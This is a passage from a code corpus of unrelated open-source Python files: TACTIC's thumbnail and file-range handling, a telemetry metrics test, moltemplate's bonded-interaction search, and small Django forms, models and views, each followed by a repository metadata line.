if value:
output = value[0].strip()
if not output:
err = value[1]
print err
return output
get_md5 = staticmethod(get_md5)
def is_file_group(file_path):
'''returns True if it is a file group'''
return not (file_path.find('#') == -1 and file_path.find('%') == -1)
is_file_group = staticmethod(is_file_group)
class FileAccess(SObject):
SEARCH_TYPE = "sthpw/file_access"
def create(file):
file_code = file.get_code()
file_access = FileAccess(FileAccess.SEARCH_TYPE)
file_access.set_value("file_code", file_code)
security = WebContainer.get_security()
user = security.get_user_name()
file_access.set_value("login", user)
file_access.commit()
return file_access
create = staticmethod(create)
class IconCreator(object):
'''Utility class that creates icons of an image or document in the
same directory as the image'''
def __init__(my, file_path):
my.file_path = file_path
# check if it exists
if not os.path.exists( file_path ):
raise FileException( \
"Error: file [%s] does not exist" % my.file_path )
my.tmp_dir = os.path.dirname(file_path)
my.icon_path = None
my.web_path = None
my.texture_mode = False
my.icon_mode = False
def set_texture_mode(my):
'''texture mode down res is 1/4 size'''
my.texture_mode = True
def set_icon_mode(my):
'''icon mode down res is 1/4 size'''
my.icon_mode = True
def get_icon_path(my):
return my.icon_path
def get_web_path(my):
return my.web_path
def create_icons(my):
my.execute()
def execute(my):
# check file name
file_name = os.path.basename(my.file_path)
ext = File.get_extension(file_name)
type = string.lower(ext)
if type == "pdf":
my._process_pdf( file_name )
elif type in File.NORMAL_EXT:
# skip icon generation for normal or video files
pass
elif type in File.VIDEO_EXT:
try:
my._process_video( file_name )
except IOError, e:
'''This is an unknown file type. Do nothing and except as a
file'''
print "WARNING: ", e.__str__()
Environment.add_warning("Unknown file type", e.__str__())
else:
# assume it is an image
try:
my._process_image( file_name )
except IOError, e:
'''This is an unknown file type. Do nothing and except as a
file'''
print "WARNING: ", e.__str__()
Environment.add_warning("Unknown file type", e.__str__())
def _process_pdf(my, file_name):
base, ext = os.path.splitext(file_name)
icon_file_name = base + "_icon.png"
tmp_icon_path = "%s/%s" % (my.tmp_dir, icon_file_name)
if sys.platform == 'darwin':
return
else:
if not Common.which("convert"):
return
try:
my.file_path = my.file_path.encode('utf-8')
import shlex, subprocess
subprocess.call(['convert', '-geometry','80','-raise','2x2','%s[0]'%my.file_path,\
"%s"%tmp_icon_path])
except Exception, e:
print "Error extracting from pdf [%s]" % e
return
# check that it actually got created
if os.path.exists(tmp_icon_path):
my.icon_path = tmp_icon_path
else:
print "Warning: [%s] did not get created from pdf" % tmp_icon_path
def get_web_file_size(my):
from pyasm.prod.biz import ProdSetting
web_file_size = ProdSetting.get_value_by_key('web_file_size')
thumb_size = (640, 480)
if web_file_size:
parts = re.split('[\Wx]+', web_file_size)
thumb_size = (640, 480)
if len(parts) == 2:
try:
thumb_size = (int(parts[0]), int(parts[1]))
except ValueError:
thumb_size = (640, 480)
return thumb_size
def _process_video(my, file_name):
ffmpeg = Common.which("ffmpeg")
if not ffmpeg:
return
thumb_web_size = my.get_web_file_size()
thumb_icon_size = (120, 100)
exts = File.get_extensions(file_name)
base, ext = os.path.splitext(file_name)
icon_file_name = "%s_icon.png" % base
web_file_name = "%s_web.jpg" % base
tmp_icon_path = "%s/%s" % (my.tmp_dir, icon_file_name)
tmp_web_path = "%s/%s" % (my.tmp_dir, web_file_name)
#cmd = '''"%s" -i "%s" -r 1 -ss 00:00:01 -t 1 -s %sx%s -vframes 1 "%s"''' % (ffmpeg, my.file_path, thumb_web_size[0], thumb_web_size[1], tmp_web_path)
#os.system(cmd)
import subprocess
try:
subprocess.call([ffmpeg, '-i', my.file_path, "-y", "-ss", "00:00:01","-t","1",\
"-s","%sx%s"%(thumb_web_size[0], thumb_web_size[1]),"-vframes","1","-f","image2", tmp_web_path])
if os.path.exists(tmp_web_path):
my.web_path = tmp_web_path
else:
my.web_path = None
except Exception, e:
Environment.add_warning("Could not process file", \
"%s - %s" % (my.file_path, e.__str__()))
pass
try:
subprocess.call([ffmpeg, '-i', my.file_path, "-y", "-ss", "00:00:01","-t","1",\
"-s","%sx%s"%(thumb_icon_size[0], thumb_icon_size[1]),"-vframes","1","-f","image2", tmp_icon_path])
if os.path.exists(tmp_icon_path):
my.icon_path = tmp_icon_path
else:
my.icon_path = None
except Exception, e:
Environment.add_warning("Could not process file", \
"%s - %s" % (my.file_path, e.__str__()))
pass
def _process_image(my, file_name):
base, ext = os.path.splitext(file_name)
# get all of the extensions
exts = File.get_extensions(file_name)
frame = 0
if len(exts) == 2:
try:
frame = int(exts[0])
base = base.replace(".%s" % exts[0], '' )
except ValueError:
frame = 0
if frame:
icon_file_name = "%s_icon.%s.png" % (base, exts[0])
web_file_name = "%s_web.%s.jpg" % (base, exts[0])
else:
icon_file_name = "%s_icon.png" % base
web_file_name = "%s_web.jpg" % base
tmp_icon_path = "%s/%s" % (my.tmp_dir, icon_file_name)
tmp_web_path = "%s/%s" % (my.tmp_dir, web_file_name)
# create the web image
try:
if my.texture_mode:
my._resize_texture(my.file_path, tmp_web_path, 0.5)
my.web_path = tmp_web_path
# create the icon
thumb_size = (120,100)
try:
my._resize_image(tmp_web_path, tmp_icon_path, thumb_size)
except TacticException:
my.icon_path = None
else:
my.icon_path = tmp_icon_path
elif my.icon_mode: # just icon, no web
# create the icon only
thumb_size = (120,100)
try:
my._resize_image(my.file_path, tmp_icon_path, thumb_size)
except TacticException:
my.icon_path = None
else:
my.icon_path = tmp_icon_path
else:
thumb_size = my.get_web_file_size()
try:
my._resize_image(my.file_path, tmp_web_path, thumb_size)
except TacticException:
my.web_path = None
else:
my.web_path = tmp_web_path
# create the icon
thumb_size = (120,100)
try:
my._resize_image(tmp_web_path, tmp_icon_path, thumb_size)
except TacticException:
my.icon_path = None
else:
my.icon_path = tmp_icon_path
# check icon file size, reset to none if it is empty
# TODO: use finally in Python 2.5
if my.web_path:
web_path_size = os.stat(my.web_path)[stat.ST_SIZE]
if not web_path_size:
my.web_path = None
if my.icon_path:
icon_path_size = os.stat(my.icon_path)[stat.ST_SIZE]
if not icon_path_size:
my.icon_path = None
except IOError, e:
Environment.add_warning("Could not process file", \
"%s - %s" % (my.file_path, e.__str__()))
my.web_path = None
my.icon_path = None
def _extract_frame(my, large_path, small_path, thumb_size):
pass
def _resize_image(my, large_path, small_path, thumb_size):
try:
large_path = large_path.encode('utf-8')
small_path = small_path.encode('utf-8')
if HAS_IMAGE_MAGICK:
# generate imagemagick command
convert_cmd = []
convert_cmd.append(convert_exe)
# png's and psd's can have multiple layers which need to be flattened to make an accurate thumbnail
if large_path.lower().endswith('png'):
convert_cmd.append('-flatten')
if large_path.lower().endswith('psd'):
large_path += "[0]"
convert_cmd.extend(['-resize','%sx%s'%(thumb_size[0], thumb_size[1])])
# FIXME: needs PIL for this ... should use ImageMagick to find image size
if HAS_PIL:
try:
im = Image.open(large_path)
x,y = im.size
except Exception, e:
print "WARNING: ", e
x = 0
y = 0
if x < y:
# icons become awkward if height is bigger than width
# add white background for more reasonable icons
convert_cmd.extend(['-background','white'])
convert_cmd.extend(['-gravity','center'])
convert_cmd.extend(['-extent','%sx%s'%(thumb_size[0], thumb_size[1])])
convert_cmd.append('%s'%(large_path))
convert_cmd.append('%s'%(small_path))
subprocess.call(convert_cmd)
# if we don't have ImageMagick, use PIL, if installed (in non-mac os systems)
elif HAS_PIL:
# use PIL
# create the thumbnail
im = Image.open(large_path)
try:
im.seek(1)
except EOFError:
is_animated = False
else:
is_animated = True
im.seek(0)
im = im.convert('RGB')
x,y = im.size
to_ext = "PNG"
if small_path.lower().endswith('jpg') or small_path.lower().endswith('jpeg'):
to_ext = "JPEG"
if x >= y:
im.thumbnail( (thumb_size[0],10000), Image.ANTIALIAS )
im.save(small_path, to_ext)
else:
#im.thumbnail( (10000,thumb_size[1]), Image.ANTIALIAS )
x,y = im.size
# first resize to match this thumb_size
base_height = thumb_size[1]
h_percent = (base_height/float(y))
base_width = int((float(x) * float(h_percent)))
im = im.resize((base_width, base_height), Image.ANTIALIAS )
# then paste to white image
im2 = Image.new( "RGB", thumb_size, (255,255,255) )
offset = (thumb_size[0]/2) - (im.size[0]/2)
im2.paste(im, (offset,0) )
im2.save(small_path, to_ext)
# if neither IM nor PIL is installed, check if this is a mac system and use sips if so
elif sys.platform == 'darwin':
convert_cmd = ['sips', '--resampleWidth', '%s'%thumb_size[0], '--out', small_path, large_path]
subprocess.call(convert_cmd)
else:
raise TacticException('No image manipulation tool installed')
except Exception, e:
print "Error: ", e
# after these operations, confirm that the icon has been generated
if not os.path.exists(small_path):
raise TacticException('Icon generation failed')
def _resize_texture(my, large_path, small_path, scale):
# create the thumbnail
try:
im = Image.open(large_path)
x,y = im.size
resize = int( float(x) * scale )
im.thumbnail( (resize,10000), Image.ANTIALIAS )
im.save(small_path, "PNG")
except:
if sys.platform == 'darwin':
cmd = "sips --resampleWidth 25%% --out %s %s" \
% (large_path, small_path)
else:
cmd = "convert -resize 25%% %s %s" \
% (large_path, small_path)
os.system(cmd)
if not os.path.exists(small_path):
raise
def add_icons(file_paths):
new_file_paths=[]
new_file_types=[]
for file_path in file_paths:
# create icons and add to the list
creator = IconCreator(file_path)
creator.create_icons()
icon_path = creator.get_icon_path()
new_file_paths.append(icon_path)
new_file_types.append("icon")
web_path = creator.get_web_path()
new_file_paths.append(web_path)
new_file_types.append("web")
return new_file_paths, new_file_types
add_icons = staticmethod(add_icons)
class FileGroup(File):
'''Handles groups of files.
The file paths have the following syntax
<file>.####
Where the number signs indicate padding to be replaced by the file_range
The file_range parameter has the following syntax:
1-12 Means from files 1-12
'''
def check_paths(file_path, file_range):
''' check existence of files. this expects a FileRange object'''
expanded = FileGroup.expand_paths(file_path, file_range)
for expand in expanded:
if not System().exists(expand):
raise FileException("File '%s' does not exist!" % expand)
return expanded
check_paths = staticmethod(check_paths)
def create( file_path, file_range, search_type, search_id, file_type=None ):
expanded = FileGroup.check_paths(file_path, file_range)
file_name = os.path.basename(file_path)
file = File(File.SEARCH_TYPE)
file.set_value("file_name", file_name)
file.set_value("search_type", search_type)
file.set_value("search_id", search_id)
from stat import ST_SIZE
total = 0
for expanded in expanded:
size = os.stat(expanded)[ST_SIZE]
total += size
project = Project.get()
file.set_value("project_code", project.get_code())
file.set_value("st_size", total)
file.set_value("file_range", file_range.get_key())
if file_type:
file.set_value("type", file_type)
file.set_value("base_type", File.BASE_TYPE_SEQ)
file.commit()
return file
create = staticmethod(create)
def expand_paths( file_path, file_range ):
'''expands the file paths, replacing # as specified in the file_range object'''
file_paths = []
# frame_by is not really used here yet
frame_start, frame_end, frame_by = file_range.get_values()
# support %0.4d notation
if file_path.find('#') == -1:
for i in range(frame_start, frame_end+1, frame_by):
expanded = file_path % i
file_paths.append( expanded )
else:
# find out the number of #'s in the path
padding = len( file_path[file_path.index('#'):file_path.rindex('#')] )+1
for i in range(frame_start, frame_end+1, frame_by):
expanded = file_path.replace( '#'*padding, str(i).zfill(padding) )
file_paths.append(expanded)
return file_paths
expand_paths = staticmethod(expand_paths)
def extract_template_and_range(cls, paths):
frame = None
# do we extract a range?
padding = 0
for i in range(12,0,-1):
p = re.compile("(\d{%d,})" % i)
path = paths[0].replace("\\", "/")
basename = os.path.basename(path)
dirname = os.path.dirname(path)
m = p.search(basename)
if m:
frame = m.groups()[0]
padding = len(frame)
break
if not frame:
padding = 4
frame = 'x'*padding
template = basename.replace(frame, '#'*padding)
frange = []
last_frame = None
p = re.compile("(\d{%s})" % padding)
for path in paths:
path = path.replace("\\", "/")
basename = os.path.basename(path)
m = p.search(basename)
if m:
frame = int(m.groups()[0])
else:
frame = 0
# the first one is always added
if last_frame == None:
frange.append(frame)
frange.append('-')
frange.append(frame)
last_frame = frame
continue
# the next ones are not
diff = frame - last_frame
if diff == 1:
frange[-1] = frame
else:
frange.append(frame)
frange.append('-')
frange.append(frame)
last_frame = frame
template = "%s/%s" % (dirname,template)
frange = "".join([str(x) for x in frange])
return template, frange
extract_template_and_range = classmethod(extract_template_and_range)
class FileRange(object):
def __init__(my, frame_start=1, frame_end=1, frame_by=1):
my.frame_start = frame_start
my.frame_end = frame_end
my.frame_by = frame_by
assert(isinstance(frame_start, (int)))
assert(isinstance(frame_end, (int)))
assert(isinstance(frame_by, (int)))
def get_frame_by(my):
return my.frame_by
def get_frame_start(my):
return my.frame_start
def get_frame_end(my):
return my.frame_end
def set_frame_by(my, frame_by):
assert(isinstance(frame_by, (int)))
my.frame_by = frame_by
def set_duration(my, duration):
my.frame_start = 1
my.frame_end = duration
def get_num_frames(my):
return (my.frame_end - my.frame_start + 1) / my.frame_by
def get_key(my):
return "%s-%s/%s" % (my.frame_start, my.frame_end, my.frame_by)
def get_display(my):
if my.frame_by == 1:
return "%s-%s" % (my.frame_start, my.frame_end)
else:
return my.get_key()
def get_values(my):
return (my.frame_start, my.frame_end, my.frame_by)
# static method
def get(file_range):
''' build a FileRange obj from a string'''
frame_by = 1
if file_range.find("/") != -1:
file_range, frame_by = file_range.split("/")
tmps = file_range.split("-")
if len(tmps) > 2:
raise FileException("Unable to determine file_range [%s]" %file_range)
frame_start, frame_end = tmps[0], tmps[1]
frame_start = int(frame_start)
frame_end = int(frame_end)
frame_by = int(frame_by)
return FileRange(frame_start, frame_end, frame_by)
get = staticmethod(get)
| southpawtech/TACTIC-DEV | src/pyasm/biz/file.py | Python | epl-1.0 | 34,859 | 0.008721 |
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, you can obtain one at http://mozilla.org/MPL/2.0/.
from atmo.stats.models import Metric
def test_metrics_record(now, one_hour_ago):
Metric.record("metric-key-1")
Metric.record("metric-key-2", 500)
Metric.record("metric-key-3", data={"other-value": "test"})
Metric.record("metric-key-4", created_at=one_hour_ago, data={"other-value-2": 100})
m = Metric.objects.get(key="metric-key-1")
assert m.value == 1
assert m.created_at.replace(microsecond=0) == now
assert m.data is None
m = Metric.objects.get(key="metric-key-2")
assert m.value == 500
assert m.created_at.replace(microsecond=0) == now
assert m.data is None
m = Metric.objects.get(key="metric-key-3")
assert m.value == 1
assert m.created_at.replace(microsecond=0) == now
assert m.data == {"other-value": "test"}
m = Metric.objects.get(key="metric-key-4")
assert m.value == 1
assert m.created_at.replace(microsecond=0) == one_hour_ago
assert m.data == {"other-value-2": 100}
| mozilla/telemetry-analysis-service | tests/test_stats.py | Python | mpl-2.0 | 1,163 | 0.00086 |
#!/usr/bin/env python
# Author: Andrew Jewett (jewett.aij at g mail)
# http://www.chem.ucsb.edu/~sheagroup
# License: 3-clause BSD License (See LICENSE.TXT)
# Copyright (c) 2012, Regents of the University of California
# All rights reserved.
import sys
from nbody_graph_search import *
#from collections import namedtuple
if sys.version < '2.7':
sys.stderr.write('--------------------------------------------------------\n'
'----------------- WARNING: OLD PYTHON VERSION ----------\n'
' This program is untested on your python version ('+sys.version+').\n'
' PLEASE LET ME KNOW IF THIS PROGRAM CRASHES (and upgrade python).\n'
' -Andrew 2013-10-25\n'
'--------------------------------------------------------\n'
'--------------------------------------------------------\n')
from ordereddict import OrderedDict
else:
from collections import OrderedDict
from collections import defaultdict
from ttree_lex import MatchesPattern, MatchesAll, InputError
#import gc
def GenInteractions_int(G_system,
g_bond_pattern,
typepattern_to_coefftypes,
canonical_order, #function to sort atoms and bonds
atomtypes_int2str,
bondtypes_int2str,
report_progress = False): #print messages to sys.stderr?
"""
GenInteractions() automatically determines a list of interactions
present in a system of bonded atoms (argument "G_system"),
which satisfy the bond topology present in "g_bond_pattern", and
satisfy the atom and bond type requirements in "typepattern_to_coefftypes".
Whenever a set of atoms in "G_system" are bonded together in a way which
matches "g_bond_pattern", and when the atom and bond types is consistent
with one of the entries in "typepattern_to_coefftypes", the corresponding
list of atoms from G_system is appended to the list of results.
These results (the list of lists of atoms participating in an interaction)
are organized according their corresponding "coefftype", a string
which identifies the type of interaction they obey as explained above.
results are returned as a dictionary using "coefftype" as the lookup key.
Arguments:
-- typepattern_to_coefftypes is a list of 2-tuples --
The first element of the 2-tuple is the "typepattern".
It contains a string describing a list of atom types and bond types.
The typepattern is associated with a "coefftype",
which is the second element of the 2-tuple. This is a string
which identifies the type of interaction between the atoms.
Later on, this string can be used to lookup the force field
parameters for this interaction elsewhere.)
-- Arguments: G_system, g_bond_pattern, atomtypes_int2str, bondtypes_int2str --
G_system stores a list of atoms and bonds, and their attributes in
"Ugraph" format. In this format:
Atom ID numbers are represented by indices into the G_system.verts[] list.
Bond ID numbers are represented by indices into the G_system.edges[] list.
Atom types are represented as integers in the G_system.verts[i].attr list.
Bond types are represented as integers in the G_system.edges[i].attr list.
They are converted into strings using
atomtypes_int2str, and bondtypes_int2str.
g_bond_pattern is a graph which specifies the type of bonding between
the atoms required for a match. It is in Ugraph format (however the
atom and bond types are left blank.)
Atom and bond types are supplied by the user in string format. (These
strings typically encode integers, but could be any string in principle.)
The string-version of the ith atom type is stored in
atomtypes_int2str[ G_system.verts[i].attr ]
The string-version of the ith bond type is stored in
bondtypes_int2str[ G_system.edges[i].attr ]
-- The "canonical_order" argument: --
The search for atoms with a given bond pattern often yields
redundant matches. There is no difference for example
between the angle formed between three consecutively
bonded atoms (named, 1, 2, 3, for example), and the
angle between the same atoms in reverse order (3, 2, 1).
However both triplets of atoms will be returned by the subgraph-
matching algorithm when searching for ALL 3-body interactions.)
To eliminate this redundancy, the caller must supply a "canonical_order"
argument. This is a function which sorts the atoms and bonds in a way
which is consistent with the type of N-body interaction being considered.
The atoms (and bonds) in a candidate match are rearranged by the
canonical_order(). Then the re-ordered list of atom and bond ids is
tested against the list of atom/bond ids in the matches-found-so-far,
before it is added.
"""
if report_progress:
startatomid = 0
sys.stderr.write(' searching for matching bond patterns:\n')
sys.stderr.write(' 0%')
# Figure out which atoms from "G_system" bond together in a way which
# matches the "g_bond_pattern" argument. Organize these matches by
# atom and bond types and store all of the non-redundant ones in
# the "interactions_by_type" variable.
gm = GraphMatcher(G_system, g_bond_pattern)
interactions_by_type = defaultdict(list)
for atombondids in gm.Matches():
# "atombondids" is a tuple.
# atombondids[0] has atomIDs from G_system corresponding to g_bond_pattern
# (These atomID numbers are indices into the G_system.verts[] list.)
# atombondids[1] has bondIDs from G_system corresponding to g_bond_pattern
# (These bondID numbers are indices into the G_system.edges[] list.)
# It's convenient to organize the list of interactions-between-
# atoms in a dictionary indexed by atomtypes and bondtypes.
# (Because many atoms and bonds typically share the same type,
# organizing the results this way makes it faster to check
# whether a given interaction matches a "typepattern" defined
# by the user. We only have to check once for the whole group.)
atombondtypes = \
(tuple([G_system.GetVert(Iv).attr for Iv in atombondids[0]]),
tuple([G_system.GetEdge(Ie).attr for Ie in atombondids[1]]))
interactions_by_type[atombondtypes].append(atombondids)
if report_progress:
# GraphMatcher.Matches() searches for matches in an order
# that selects a different atomid number from G_system,
# starting at 0, and continuing up to the number of atoms (-1)
# in the system (G_system.nv-1), and using this as the first
# atom in the match (ie match[0][0]). This number can be used
# to guess much progress has been made so far.
oldatomid = startatomid
startatomid = atombondids[0][0]
percent_complete = (100 * startatomid) // G_system.GetNumVerts()
# report less often as more progress made
if percent_complete <= 4:
old_pc = (100 * oldatomid) // G_system.GetNumVerts()
if percent_complete > old_pc:
sys.stderr.write(' '+str(percent_complete)+'%')
elif percent_complete <= 8:
pc_d2 = (100 * startatomid) // (2*G_system.GetNumVerts())
oldpc_d2 = (100 * oldatomid) // (2*G_system.GetNumVerts())
if pc_d2 > oldpc_d2:
sys.stderr.write(' '+str(percent_complete)+'%')
elif percent_complete <= 20:
pc_d4 = (100 * startatomid) // (4*G_system.GetNumVerts())
oldpc_d4 = (100 * oldatomid) // (4*G_system.GetNumVerts())
if pc_d4 > oldpc_d4:
sys.stderr.write(' '+str(percent_complete)+'%')
else:
pc_d10 = (100 * startatomid) // (10*G_system.GetNumVerts())
oldpc_d10 = (100 * oldatomid) // (10*G_system.GetNumVerts())
if pc_d10 > oldpc_d10:
sys.stderr.write(' '+str(percent_complete)+'%')
if report_progress:
sys.stderr.write(' 100%\n')
#sys.stderr.write(' ...done\n')
#sys.stderr.write(' Looking up available atom and bond types...')
#coefftype_to_atomids = defaultdict(list)
#abids_to_coefftypes = defaultdict(list)
coefftype_to_atomids = OrderedDict()
abids_to_coefftypes = OrderedDict()
# -------------------- reporting progress -----------------------
if report_progress:
# The next interval of code is not technically necessary, but it makes
# the printed output easier to read by excluding irrelevant interactions
# Now, test each match to see if the atoms and bonds involved match
# any of the type-patterns in the "typepattern_to_coefftypes" argument.
types_atoms_all_str = set([])
types_bonds_all_str = set([])
for typepattern, coefftype in typepattern_to_coefftypes:
for atombondtypes, abidslist in interactions_by_type.items():
for Iv in atombondtypes[0]:
types_atoms_all_str.add(atomtypes_int2str[Iv])
for Ie in atombondtypes[1]:
types_bonds_all_str.add(bondtypes_int2str[Ie])
# ------------------ reporting progress (end) -------------------
count = 0
for typepattern, coefftype in typepattern_to_coefftypes:
# ------------------ reporting progress -----------------------
# The next interval of code is not technically necessary, but it makes
# the printed output easier to read by excluding irrelevant interactions
if report_progress:
# Check to see if the atoms or bonds referred to in typepattern
# are (potentially) satisfied by any of the atoms present in the system.
# If any of the required atoms for this typepattern are not present
# in this system, then skip to the next typepattern.
atoms_available_Iv = [False for Iv in range(0, g_bond_pattern.GetNumVerts())]
for Iv in range(0, g_bond_pattern.GetNumVerts()):
for type_atom_str in types_atoms_all_str:
if MatchesPattern(type_atom_str, typepattern[Iv]):
atoms_available_Iv[Iv] = True
atoms_available = True
for Iv in range(0, g_bond_pattern.GetNumVerts()):
if not atoms_available_Iv[Iv]:
atoms_available = False
bonds_available_Ie = [False for Ie in range(0, g_bond_pattern.GetNumEdges())]
for Ie in range(0, g_bond_pattern.GetNumEdges()):
for type_bond_str in types_bonds_all_str:
if MatchesPattern(type_bond_str,
typepattern[g_bond_pattern.GetNumVerts()+Ie]):
bonds_available_Ie[Ie] = True
bonds_available = True
for Ie in range(0, g_bond_pattern.GetNumEdges()):
if not bonds_available_Ie[Ie]:
bonds_available = False
if atoms_available and bonds_available:
# Explanation:
# (Again) only if ALL of the atoms and bond requirements for
# this type pattern are satisfied by at least SOME of the atoms
# present in the this system, ...THEN print a status message.
# (Because for complex all-atom force-fields, the number of
# possible atom types, and typepatterns far exceeds the number
# of atom types typically present in the system. Otherwise
# hundreds of kB of irrelevant information can be printed.)
sys.stderr.write(' checking '+coefftype+' type requirements:'
#' (atom-types,bond-types) '
'\n '+str(typepattern)+'\n')
# ------------------ reporting progress (end) -------------------
for atombondtypes, abidslist in interactions_by_type.items():
# express atom & bond types in a tuple of the original string format
types_atoms = [atomtypes_int2str[Iv] for Iv in atombondtypes[0]]
types_bonds = [bondtypes_int2str[Ie] for Ie in atombondtypes[1]]
type_strings = types_atoms + types_bonds
# use string comparisons to check for a match with typepattern
if MatchesAll(type_strings, typepattern): #<-see "ttree_lex.py"
for abids in abidslist:
# Re-order the atoms (and bonds) in a "canonical" way.
# Only add new interactions to the list after re-ordering
# them and checking that they have not been added earlier.
# (...well not when using the same coefftype at least.
# This prevents the same triplet of atoms from
# being used to calculate the bond-angle twice:
# once for 1-2-3 and 3-2-1, for example.)
abids = canonical_order(abids)
redundant = False
if abids in abids_to_coefftypes:
coefftypes = abids_to_coefftypes[abids]
if coefftype in coefftypes:
redundant = True
if not redundant:
# (It's too bad python does not
# have an Ordered defaultdict)
if coefftype in coefftype_to_atomids:
coefftype_to_atomids[coefftype].append(abids[0])
else:
coefftype_to_atomids[coefftype]=[abids[0]]
if abids in abids_to_coefftypes:
abids_to_coefftypes[abids].append(coefftype)
else:
abids_to_coefftypes[abids] = [coefftype]
count += 1
if report_progress:
sys.stderr.write(' (found '+
str(count)+' non-redundant matches)\n')
return coefftype_to_atomids
def GenInteractions_str(bond_pairs,
g_bond_pattern,
typepattern_to_coefftypes,
canonical_order, #function to sort atoms and bonds
atomids_str,
atomtypes_str,
bondids_str,
bondtypes_str,
report_progress = False): #print messages to sys.stderr?
assert(len(atomids_str) == len(atomtypes_str))
assert(len(bondids_str) == len(bondtypes_str))
# The atomids and atomtypes and bondtypes are strings.
# First we assign a unique integer id to each string.
atomids_str2int = {}
atomtypes_str2int = {}
atomtypes_int2str = []
atomtype_int = 0
for i in range(0, len(atomids_str)):
if atomids_str[i] in atomids_str2int:
raise InputError('Error: multiple atoms have the same id ('+
str(atomids_str[i])+')')
atomids_str2int[atomids_str[i]] = i
#atomtypes_int = len(atomtypes_int)+1
if (not (atomtypes_str[i] in atomtypes_str2int)):
atomtypes_str2int[atomtypes_str[i]] = atomtype_int
atomtypes_int2str.append(atomtypes_str[i])
atomtype_int += 1
#atomtypes_int.append(atomtype_int)
bondids_str2int = {}
bondtypes_str2int = {}
bondtypes_int2str = []
bondtype_int = 0
for i in range(0, len(bondids_str)):
if bondids_str[i] in bondids_str2int:
raise InputError('Error: multiple bonds have the same id ('+
str(bondids_str[i])+')')
bondids_str2int[bondids_str[i]] = i
#bondtype_int = len(bondtypes_int)+1
if (not (bondtypes_str[i] in bondtypes_str2int)):
bondtypes_str2int[bondtypes_str[i]] = bondtype_int
bondtypes_int2str.append(bondtypes_str[i])
bondtype_int += 1
# Now convert "bond_pairs" into the UGraph format
G_system = Ugraph()
for iv in range(0, len(atomtypes_str)):
G_system.AddVertex(iv, atomtypes_str2int[atomtypes_str[iv]])
for ie in range(0, len(bond_pairs)):
atomid1_str = bond_pairs[ie][0]
atomid2_str = bond_pairs[ie][1]
if (atomid1_str not in atomids_str2int):
raise InputError('Error in Bonds Section:\n'
' '+atomid1_str+' is not defined in Atoms section\n')
if (atomid2_str not in atomids_str2int):
raise InputError('Error in Bonds Section:\n'
' '+atomid2_str+' is not defined in Atoms section\n')
G_system.AddEdge(atomids_str2int[atomid1_str],
atomids_str2int[atomid2_str],
bondtypes_str2int[bondtypes_str[ie]])
coefftype_to_atomids_int = GenInteractions_int(G_system,
g_bond_pattern,
typepattern_to_coefftypes,
canonical_order,
atomtypes_int2str,
bondtypes_int2str,
report_progress)
coefftype_to_atomids_str = OrderedDict()
for coefftype, atomidss_int in coefftype_to_atomids_int.items():
if report_progress:
sys.stderr.write(' processing coefftype: '+str(coefftype)+'\n')
for atomids_int in atomidss_int:
if coefftype in coefftype_to_atomids_str:
coefftype_to_atomids_str[coefftype].append(
[atomids_str[iv] for iv in atomids_int])
else:
coefftype_to_atomids_str[coefftype] = \
[[atomids_str[iv] for iv in atomids_int]]
#gc.collect()
return coefftype_to_atomids_str
| lkostler/AME60649_project_final | moltemplate/moltemplate/src/nbody_by_type_lib.py | Python | bsd-3-clause | 18,422 | 0.0057 |
def generate_documentation():
print("generate_documentation Stub")
return True
| rorychatt/GPCook | gpcook/modules/documentation.py | Python | mit | 88 | 0 |
from django import forms
from django.core.exceptions import ValidationError
from projects.models import Project
class CreateProjectForm(forms.ModelForm):
def __init__(self, user, *args, **kwargs):
self.user = user
super(CreateProjectForm, self).__init__(*args, **kwargs)
def clean_name(self):
return self.cleaned_data['name'].strip()
def clean_code(self):
code = self.cleaned_data['code'].strip().lower().replace(' ', '_')
if Project.objects.filter(user=self.user, code=code).exists():
raise ValidationError('A project with this code already exists')
return code
class Meta:
model = Project
fields = ['name', 'code', 'public']
class CreateProjectFormBasic(forms.Form):
name = forms.CharField(label='Name', max_length=255)
code = forms.SlugField(label='Code', max_length=255)
def clean_name(self):
return self.cleaned_data['name'].strip()
def clean_code(self):
return self.cleaned_data['code'].strip().lower().replace(' ', '_')
| michel-cf/Propeller-WebIDE | projects/forms.py | Python | lgpl-3.0 | 1,061 | 0 |
# -*- coding: utf-8 -*-
from django.db import models
from django.utils.translation import ugettext_lazy as _
from usuarios.models import Usuario
class Sistema(models.Model):
sigla = models.CharField(verbose_name=_('Sigla'), max_length=10)
nome = models.CharField(verbose_name=_('Nome Sistema'),
max_length=100)
descricao = models.TextField(null=True,
blank=True,
verbose_name=_('Descrição'))
class Meta:
verbose_name = _('Sistema')
verbose_name_plural = _('Sistemas')
def __str__(self):
return "%s - %s" % (self.sigla, self.nome)
class Solicitacao(models.Model):
codigo = models.PositiveIntegerField(unique=True)
usuario = models.ForeignKey(Usuario)
sistema = models.ForeignKey(Sistema)
titulo = models.CharField(verbose_name=_('Título'), max_length=100)
resumo = models.CharField(verbose_name=_('Resumo'), max_length=50)
casa_legislativa = models.CharField(verbose_name=_('Casa Legislativa'),
max_length=200)
email_contato = models.EmailField(blank=True,
null=True,
verbose_name=_('Email de contato'))
# Substituir por usuarios.models.Telefone?
telefone_contato = models.CharField(max_length=15,
null=True,
blank=True,
verbose_name=_('Telefone de contato'))
data_criacao = models.DateTimeField(auto_now_add=True,
verbose_name=_('Data de criação'))
descricao = models.TextField(blank=True,
null=True,
verbose_name=_('Descrição'))
osticket = models.CharField(blank=True,
null=True,
max_length=256,
verbose_name=_('Código Ticket'))
class Meta:
verbose_name = _('Solicitação de Novo Serviço')
verbose_name_plural = _('Solicitações de Novos Serviços')
ordering = ['data_criacao']
def __str__(self):
return "%s - %s" % (self.codigo, self.resumo)
| interlegis/atendimento | solicitacoes/models.py | Python | gpl-3.0 | 2,330 | 0 |
# -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2016, Shoop Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import unicode_literals
from django.apps import apps
from django.contrib.auth import get_user_model
from django.core.exceptions import FieldDoesNotExist
from django.db.models import Q
from django.http import JsonResponse
from django.utils.encoding import force_text
from django.utils.translation import ugettext_lazy as _
from django.views.generic import TemplateView
from shuup.core.models import Contact, Product
def _field_exists(model, field):
try:
model._meta.get_field(field)
return True
except FieldDoesNotExist:
return False
class MultiselectAjaxView(TemplateView):
model = None
search_fields = []
result_limit = 20
def init_search_fields(self, cls):
self.search_fields = []
